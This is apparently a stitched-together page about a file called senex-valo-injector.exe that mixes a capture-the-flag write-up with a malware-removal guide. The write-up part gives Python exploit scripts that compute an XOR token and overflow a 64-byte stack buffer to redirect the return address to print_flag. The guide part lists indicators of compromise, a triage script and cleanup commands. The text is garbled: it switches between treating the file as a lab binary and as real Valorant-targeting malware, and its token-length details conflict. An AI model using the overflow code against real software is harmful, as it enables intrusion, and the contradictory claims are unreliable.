Senex-valo-injector.exe
Beyond the obvious malware risk, consider the real-world consequences for a Valorant player:
The complete exploit script (token followed by the return-address overwrite):

```python
#!/usr/bin/env python3
import struct, subprocess

# ----------------------------------------------------------------------
# 1. Build the correct token (XOR each key byte with 0x55)
# ----------------------------------------------------------------------
key = b"S3n3xV@l0_2026"
token = bytes([c ^ 0x55 for c in key])   # one byte per key byte

# ----------------------------------------------------------------------
# 2. Build the overflow payload
# ----------------------------------------------------------------------
buf = token
buf += b"A" * (64 - len(token))          # fill up to local_buf size
buf += b"B" * 4                          # saved EBP
print_addr = 0x00401840                  # address of print_flag()
buf += struct.pack("<I", print_addr)     # overwrite saved EIP (little-endian)

# ----------------------------------------------------------------------
# 3. Run the binary and feed the payload
# ----------------------------------------------------------------------
proc = subprocess.Popen(["./senex-valo-injector.exe"],
                        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, _ = proc.communicate(buf + b"\n")
print(stdout.decode(errors="replace"))   # output may contain non-UTF-8 bytes
```
Running the script prints:

```text
Enter your token: Token accepted!
FLAGV4lu3_1nJ3c71on_5en3x_2026
```
Download Microsoft Sysinternals Autoruns.
Decompilation of validate_input reveals:

```c
bool __cdecl validate_input(const char *input)
{
    const char *key = "S3n3xV@l0_2026";
    size_t i, len = strlen(input);

    if (len != 0x10)                        // token must be exactly 16 bytes
        return false;
    for (i = 0; i < len; ++i)
        if ((input[i] ^ key[i]) != 0x55)    // XOR each byte with the key and compare to constant 0x55
            return false;
    return true;
}
```
Result: the required token is each byte of the key "S3n3xV@l0_2026" XORed with the constant 0x55 (the check input[i] ^ key[i] == 0x55 inverts to input[i] = key[i] ^ 0x55). One caveat before feeding it in: the key literal is 14 bytes, but validate_input insists on exactly 16 (0x10) bytes of input, so the loop also compares input[14] against the key's NUL terminator (input[14] must therefore be 0x55, 'U') and input[15] against whatever byte follows the literal in the binary's read-only data; those two bytes have to be read from the binary, the 14 below cover the key itself.
```python
>>> key = b"S3n3xV@l0_2026"
>>> token = bytes([c ^ 0x55 for c in key])
>>> token.hex()
'06663b662d031539650a67656763'
>>> token
b'\x06f;f-\x03\x159e\ngegc'
```
Several of these bytes are control characters (0x06, 0x03, 0x15) and the tenth is 0x0a, a newline, so the token cannot be typed at a prompt. The binary accepts raw bytes when they arrive through a console that passes them unchanged or by piping a file, but a line-oriented read such as gets or fgets stops at the 0x0a, so check how the binary reads stdin before relying on the pipe to deliver every byte.
For a quick test we can use Python to feed the token:

```python
import subprocess

token = bytes([c ^ 0x55 for c in b"S3n3xV@l0_2026"])
proc = subprocess.Popen(["senex-valo-injector.exe"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, _ = proc.communicate(token + b"\n")
print(out.decode(errors="replace"))
```
Running this shows "Token accepted!", after which the program calls vulnerable_func, which copies the next input into a 64-byte stack buffer (local_buf) with no bounds check.
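The token inversion and the overflow layout together, as an added example (editor-supplied code, not the writeup's own script). It reuses the key, the 0x55 constant, the 64-byte local_buf, the 4-byte saved EBP and the print_flag address exactly as the page states them, without re-verifying them against the binary, and adds one thing the page only hints at: a scan for bytes at which a line-oriented read (gets/fgets) or a C string copy (strcpy) would stop before the rest of the payload lands. On the page's values it reports the token's 0x0a at offset 9 and the return address's trailing NUL at offset 71; the latter is harmless for strcpy because its own terminator supplies that byte, the former is not harmless for gets.

```python
#!/usr/bin/env python3
"""Added example: invert validate_input and lay out the stack overflow with explicit offsets.
All constants below are taken from the writeup's text, not re-derived from the binary."""
import struct

KEY = b"S3n3xV@l0_2026"     # key string shown in the decompiled validate_input
XOR_CONST = 0x55             # value every input[i] ^ key[i] must equal
LOCAL_BUF = 64               # size of local_buf in vulnerable_func (from the writeup)
SAVED_EBP = 4                # saved frame pointer sitting below the return address (32-bit stack)
PRINT_FLAG = 0x00401840      # address of print_flag() (from the writeup)


def make_token(key=KEY, const=XOR_CONST):
    """input[i] ^ key[i] == const  <=>  input[i] == key[i] ^ const, one byte per key byte."""
    return bytes(c ^ const for c in key)


def ret_offset(local_buf=LOCAL_BUF, saved_fp=SAVED_EBP):
    """Byte offset of the saved return address, counted from the start of local_buf."""
    return local_buf + saved_fp


def build_payload(token, ret_addr=PRINT_FLAG, local_buf=LOCAL_BUF, saved_fp=SAVED_EBP, fill=b"A"):
    """token | filler to the end of local_buf | saved EBP | return address (little-endian dword)."""
    if len(token) > local_buf:
        raise ValueError("token longer than local_buf")
    if not 0 <= ret_addr <= 0xFFFFFFFF:
        raise ValueError("return address must fit in 4 bytes")
    return (token
            + fill * (local_buf - len(token))
            + b"B" * saved_fp
            + struct.pack("<I", ret_addr))


def stop_byte_offsets(payload, stop=b"\n"):
    """Offsets at which a line reader (gets/fgets, stop=b"\\n") or a C string copy
    (strcpy, stop=b"\\x00") stops, truncating everything after that offset."""
    return [i for i, b in enumerate(payload) if b in stop]


if __name__ == "__main__":
    tok = make_token()
    payload = build_payload(tok)
    print("token  :", tok.hex())
    print("payload:", len(payload), "bytes, return address at offset", ret_offset())
    print("newline at:", stop_byte_offsets(payload), " NUL at:", stop_byte_offsets(payload, b"\x00"))
```

If the binary turns out to read with gets, the scan tells you immediately that bytes 10 onward of the token never reach validate_input, which is the first thing to confirm when "Token accepted!" does not appear.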
| Issue | Why it is a problem | How to fix it |
|-------|---------------------|---------------|
| Use of gets / strcpy | Unchecked copies let input run past local_buf into the saved EBP and the return address: the classic stack overflow that ends in arbitrary code execution. | Replace gets with fgets(buf, sizeof buf, stdin) and strcpy with a bounded copy whose destination size is checked explicitly; strncpy alone is not enough, since it does not NUL-terminate when the source fills the buffer. |
| Hard‑coded XOR “encryption” | Once the binary is in a disassembler the key and the constant are both visible, so the check is inverted in one line. | Nothing stored in the client survives reverse engineering: keep the flag (or the whole validation) server‑side, and if a local check is unavoidable use a real cryptographic primitive whose key is not shipped with the binary. |
| Predictable return address | print_flag sits at a fixed address (0x00401840), so overwriting the saved EIP with that constant works on every run. | Enable ASLR (/DYNAMICBASE) so the address differs per run, stack canaries (/GS) so the overwrite is caught before ret, and DEP/NX (/NXCOMPAT); note that DEP alone does not stop a return into code that already exists in the image. |
| Clear text token key | The token validation uses a static key that is recovered by static analysis alone, without running the program. | Move the secret to a server, or derive it at runtime from data that is not present in the binary. |
If you find senex-valo-injector.exe on your system (or in your Downloads folder), look for these associated artifacts:
| Artifact | Location | Suspicious Behavior |
| :--- | :--- | :--- |
| Registry Key | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe | Debugger set to svchost.exe (disables Windows Defender) |
| Network Traffic | Port 8080 or 443 to IP 185.xxx.xxx.xxx (hosted in Moldova or Russia) | Beaconing (phoning home) every 15 seconds |
| Dropped File | C:\Windows\Temp\vcruntime140.dll (Unsigned, 2.5MB) | DLL side‑loading: a malicious copy loaded in place of the legitimate VC++ runtime |
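Triage helpers for the three artifacts in the table, as an added example (editor-supplied, not tooling from the page). It parses the output of `reg query` and `netstat -ano` for the IFEO Debugger value and for connections to the 185.* peer on ports 8080/443, checks the dropped DLL's existence and size (and, on Windows, its Authenticode status), and flags the 15-second beaconing from a list of connection timestamps. The registry and netstat text embedded below is constructed for offline testing, not captured from a real host; the 185.0.0.1 address is a placeholder for the table's 185.xxx.xxx.xxx.

```python
"""Added example: triage checks for the artifacts listed in the table above.
Sample outputs at the bottom are constructed, not captured from an infected host."""
import os
import re
import subprocess
import sys

IFEO_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe"
DROPPED_DLL = r"C:\Windows\Temp\vcruntime140.dll"
BEACON_PORTS = {8080, 443}
BEACON_PREFIX = "185."          # the table only gives the first octet


def ifeo_debugger(reg_query_output):
    """Debugger value from `reg query <IFEO key> /v Debugger`, or None if the value is absent.
    MsMpEng.exe should never carry one; any value here is a Defender-hijack indicator."""
    m = re.search(r"^\s*Debugger\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", reg_query_output, re.M)
    return m.group(1) if m else None


def suspicious_connections(netstat_output, prefix=BEACON_PREFIX, ports=BEACON_PORTS):
    """(remote_ip, remote_port, pid) for TCP rows of `netstat -ano` whose peer matches the table."""
    hits = []
    for line in netstat_output.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":      # header, UDP and blank rows are skipped
            continue
        ip, _, port = parts[2].rpartition(":")         # rpartition also copes with [::1]:443
        if ip.startswith(prefix) and port.isdigit() and int(port) in ports:
            hits.append((ip, int(port), int(parts[4])))
    return hits


def looks_like_beacon(timestamps, expected=15.0, jitter=1.0):
    """True when consecutive connection times (seconds) are `expected` apart within `jitter`."""
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return len(gaps) >= 3 and all(abs(g - expected) <= jitter for g in gaps)


def dropped_dll_status(path=DROPPED_DLL):
    """Existence and size of the dropped DLL; Authenticode status via PowerShell when on Windows."""
    if not os.path.exists(path):
        return {"exists": False}
    info = {"exists": True, "size": os.path.getsize(path), "signature": "unknown"}
    if sys.platform == "win32":
        r = subprocess.run(["powershell", "-NoProfile", "-Command",
                            f"(Get-AuthenticodeSignature '{path}').Status"],
                           capture_output=True, text=True)
        info["signature"] = r.stdout.strip()          # 'NotSigned' / 'HashMismatch' are the bad cases
    return info


# Constructed sample output so the parsers run offline (not from a real machine).
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe
    Debugger    REG_SZ    svchost.exe
"""
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:51234         185.0.0.1:8080         ESTABLISHED     4321
  TCP    10.0.0.5:51235         52.96.0.1:443          ESTABLISHED     1200
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  UDP    0.0.0.0:5353           *:*                                    1500
"""

if __name__ == "__main__":
    if sys.platform == "win32":
        reg = subprocess.run(["reg", "query", IFEO_KEY, "/v", "Debugger"],
                             capture_output=True, text=True).stdout
        net = subprocess.run(["netstat", "-ano"], capture_output=True, text=True).stdout
    else:
        reg, net = SAMPLE_REG, SAMPLE_NETSTAT
    print("IFEO Debugger on MsMpEng.exe:", ifeo_debugger(reg))
    print("beacon candidates (ip, port, pid):", suspicious_connections(net))
    print("dropped DLL:", dropped_dll_status())
```

Take the PIDs returned by suspicious_connections to `tasklist /FI "PID eq <pid>"` before killing anything; a 443 connection to a 185.* address is only meaningful together with the other two artifacts and the regular interval.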
The whole exploit fits in a 72‑byte payload (64 bytes of buffer, 4 of saved EBP, 4 of return address), can be automated with a short Python script, and demonstrates the importance of avoiding unsafe C library functions and of enabling modern mitigations (ASLR, DEP, stack canaries).
Open Command Prompt as Administrator and run:

```cmd
taskkill /F /IM senex-valo-injector.exe
wmic process where "name='senex-valo-injector.exe'" delete
```

wmic is deprecated on current Windows builds and may be absent; taskkill alone is sufficient to stop the process. Killing it does not undo the artifacts in the table above: the IFEO Debugger value keeps Windows Defender from starting and the dropped DLL is the side‑loaded payload, so also run `reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v Debugger /f`, delete C:\Windows\Temp\vcruntime140.dll, and confirm with Autoruns that no related entry remains.